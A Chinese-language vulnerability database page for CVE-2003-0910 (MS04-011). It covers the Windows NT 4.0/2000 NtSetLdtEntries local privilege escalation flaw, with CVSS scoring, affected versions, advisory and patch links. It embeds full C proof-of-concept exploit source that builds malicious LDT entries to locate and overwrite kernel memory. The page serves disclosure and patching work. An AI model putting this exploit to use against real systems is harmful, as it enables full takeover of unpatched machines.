CVE-2003-0910
CVSS7.2
发布时间 :2004-06-01 00:00:00
修订时间 :2008-09-10 15:20:55
NMCOES    

[原文]The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor descriptor that points to protected memory.


[CNNVD]Windows Expand-Down数据段本地权限提升漏洞(MS04-011)(CNNVD-200406-011)

        
        Windows是微软开发的视窗操作系统。
        Windows内核包含的NtSetLdtEntries API函数由于缺少充分的验证检查,本地攻击者可以利用这个漏洞提升权限。
        问题是内核中两个独立但又有联系的漏洞引起的,第一个问题是NtSetLdtEntries API函数缺少充分验证,可绕过安全检查和可建立危险数据段。第二个问题是部分内核代码缺少过滤,用户代码传递一引用到恶意段
        (使用 NtSetLdtEntries建立),可导致修改任意内存地址。
        攻击者本地登录系统,可建立恶意LDT条目访问受保护的内存,造成权限提升,控制整个系统。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:911Windows NT Local Descriptor Table Kernel Access Vulnerability
oval:org.mitre.oval:def:890Windows 2000 Local Descriptor Table Kernel Access Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0910
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0910
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-011
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/122076
(VENDOR_ADVISORY)  CERT-VN  VU#122076
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
(VENDOR_ADVISORY)  CERT  TA04-104A
http://www.eeye.com/html/Research/Advisories/AD20040413D.html
(VENDOR_ADVISORY)  EEYE  AD20040413D
http://www.microsoft.com/technet/security/bulletin/ms04-011.asp
(UNKNOWN)  MS  MS04-011
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020068.html
(UNKNOWN)  FULLDISC  20040413 EEYE: Windows Expand-Down Data Segment Local Privilege Escalation
http://xforce.iss.net/xforce/xfdb/15707
(UNKNOWN)  XF  win-ldt-gain-privileges(15707)
http://www.securityfocus.com/bid/10122
(UNKNOWN)  BID  10122
http://www.ciac.org/ciac/bulletins/o-114.shtml
(UNKNOWN)  CIAC  O-114

- 漏洞信息

Windows Expand-Down数据段本地权限提升漏洞(MS04-011)
高危 访问验证错误
2004-06-01 00:00:00 2005-10-20 00:00:00
本地  
        
        Windows是微软开发的视窗操作系统。
        Windows内核包含的NtSetLdtEntries API函数由于缺少充分的验证检查,本地攻击者可以利用这个漏洞提升权限。
        问题是内核中两个独立但又有联系的漏洞引起的,第一个问题是NtSetLdtEntries API函数缺少充分验证,可绕过安全检查和可建立危险数据段。第二个问题是部分内核代码缺少过滤,用户代码传递一引用到恶意段
        (使用 NtSetLdtEntries建立),可导致修改任意内存地址。
        攻击者本地登录系统,可建立恶意LDT条目访问受保护的内存,造成权限提升,控制整个系统。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-011)以及相应补丁:
        MS04-011:Security Update for Microsoft Windows (835732)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

        补丁下载:
        Microsoft Windows NT? Workstation 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7F1713FC-F95C-43E5-B825-3CF72C1A0A3E&displaylang=en

        
        Microsoft Windows NT Server 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=67A6F461-D2FC-4AA0-957E-3B8DC44F9D79&displaylang=en

        
        Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=62CBA527-A827-4777-8641-28092D3AAE4F&displaylang=en

        Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, 和Microsoft Windows 2000 Service Pack 4 :
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

- 漏洞信息 (23989)

Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability (EDBID:23989)
windows local
2004-04-18 Verified
0 mslug@safechina.net
N/A [点击下载]
source: http://www.securityfocus.com/bid/10122/info

Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability.

A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entry may point into protected memory. Since this memory space is reserved for kernel operations, the attacker will likely exploit this condition to execute arbitrary code with elevated privileges.

/******************************************************************
* Windows Expand-Down Data Segment Local Privilege Escalation
* [MS04-011]
*
* Bug found by: Derek Soeder
* Author: mslug (a1476854@hotmail.com), All rights reserved.
*
* Version: PoC 0.1
*
* Tested: Win2k pro en sp4
*
* Thanks: z0mbie's article :)
*
* Compile: cl winldt.c
*
* Date: 18 Apr 2004
*******************************************************************/


#include <windows.h>
#include <stdio.h>
#include <string.h>

#if 1
   #define KernelStackPtr 0xFD000000 //
   #define BedSize 0x01000000
#else
   #define KernelStackPtr 0xF0000000
   #define BedSize 0x10000000
#endif

unsigned char bed[BedSize];
unsigned char pin[]="COOL";

int (*NtSetLdtEntries)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);

WORD SetupLDT(WORD seg, DWORD ldtbase);

unsigned long patch_to;

int main(int argc, char *argv[])
{
   DWORD ldtbase, KSP;
   int i;
   HMODULE hNtdll;
  
   if(argc<2) {
      printf("** coded by mslug@safechina.net **\n");
      printf("winldt.exe <kernel address>\n");
      return 0;
   }

   patch_to = strtoul(argv[1], 0, 16);
  
   hNtdll = LoadLibrary("ntdll.dll");
  
   (DWORD*)NtSetLdtEntries = (DWORD*)GetProcAddress(hNtdll, "NtSetLdtEntries");
  
   memset(bed, 'A', BedSize);
   bed[BedSize-1]=0;
  
   ldtbase = (DWORD) &bed[0] - KernelStackPtr;
  
   printf("[+] User-land bed : 0x%08X\n", &bed[0]);
   printf("[+] 1st LDT base : 0x%08X\n", ldtbase);

   SetupLDT(0x1f, ldtbase);
   __asm {
      push es
      push 1fh
      pop es
      mov eax, 11h //1 param
      lea edx, pin
      int 2eh
      pop es
   }

   for (KSP=0, i=0; i<BedSize-3; i++) {
      if (bed[i] =='C' && bed[i+1]=='O' &&
          bed[i+2]=='O' && bed[i+3]=='L' )
      {
         KSP = KernelStackPtr + i;
         printf("[!] Knl stack ptr : 0x%08X\n", KSP);
         //KSP = (DWORD)&bed[i]-ldtbase;
         //printf("[!] Knl stack ptr : 0x%08X\n", KSP);
         break;
      }
   }
  
   if(!KSP) {
      printf("[-] Can't locate Kernel stack pointer, try again\n");
      return 0;
   } else if (patch_to < KSP) {
      printf("[-] Can only patch kernel above KSP\n");
      return 0;
   }
  
   ldtbase = patch_to - KSP;

   printf("[+] Patch to : 0x%08X\n", patch_to);
   printf("[+] 2nd LDT base : 0x%08X\n", ldtbase);

   SetupLDT(0x17, ldtbase);
   __asm {
      push es
      push 17h
      pop es
      mov eax, 11h
      lea edx, pin
      int 2eh
      pop es
   }
  
   return 0;
}

WORD SetupLDT(WORD seg, DWORD ldtbase)
{
   LDT_ENTRY EvilLdt;
   DWORD base = ldtbase;
   DWORD limit = 0;
   int ret;
  
   EvilLdt.BaseLow = base & 0xFFFF;
   EvilLdt.HighWord.Bytes.BaseMid = base >> 16;
   EvilLdt.HighWord.Bytes.BaseHi = base >> 24;
   EvilLdt.LimitLow = (limit >> 12) & 0xFFFF;
   EvilLdt.HighWord.Bits.LimitHi = limit >> 28;
   EvilLdt.HighWord.Bits.Granularity = 1; // 0/1, if 1, limit=(limit<<12)|FFF
   EvilLdt.HighWord.Bits.Default_Big = 1; // 0=16bit 1=32bit
   EvilLdt.HighWord.Bits.Reserved_0 = 0; // 0/1
   EvilLdt.HighWord.Bits.Sys = 0; // 0/1
   EvilLdt.HighWord.Bits.Pres = 1; // 0/1 (presence bit)
   EvilLdt.HighWord.Bits.Dpl = 3; // only 3 allowed :-(
   EvilLdt.HighWord.Bits.Type = 23; // [16..27]

   ret = NtSetLdtEntries( seg,
                    *(DWORD*)&EvilLdt,
                    *(((DWORD*)&EvilLdt)+1),
                    0,0,0);
   if (ret < 0) {
      printf("[-] Set ldt error : %08X.\n", ret);
      exit(0);
   }

   return seg;
}		

- 漏洞信息

5257
Microsoft Windows Local Descriptor Table Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown Vendor Verified

- 漏洞描述

Windows contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the NtSetLdtEntries API function fails to validate user-supplied input, which can then be passed to kernel code which also fails to validate the input. This flaw may allow an attacker to execute arbitrary code in kernel space, and lead to a loss of integrity.

- 时间线

2004-04-13 Unknow
Unknow 2004-04-13

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Local Descriptor Table Local Privilege Escalation Vulnerability
Access Validation Error 10122
No Yes
2004-04-13 12:00:00 2007-10-02 05:49:00
Discovery of this vulnerability has been credited to eEye Digital Security.

- 受影响的程序版本

Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers

- 漏洞讨论

Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability.

A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entry may point into protected memory. Since this memory space is reserved for kernel operations, the attacker will likely exploit this condition to execute arbitrary code with elevated privileges.

- 漏洞利用

The following proof of concept was supplied:

- 解决方案

Microsoft has released a security bulletin and fixes to address this issue. Please see the referenced advisories for details.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows 2000 Server SP3

Microsoft Windows NT Terminal Server 4.0 SP6

Microsoft Windows NT Enterprise Server 4.0 SP6a

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站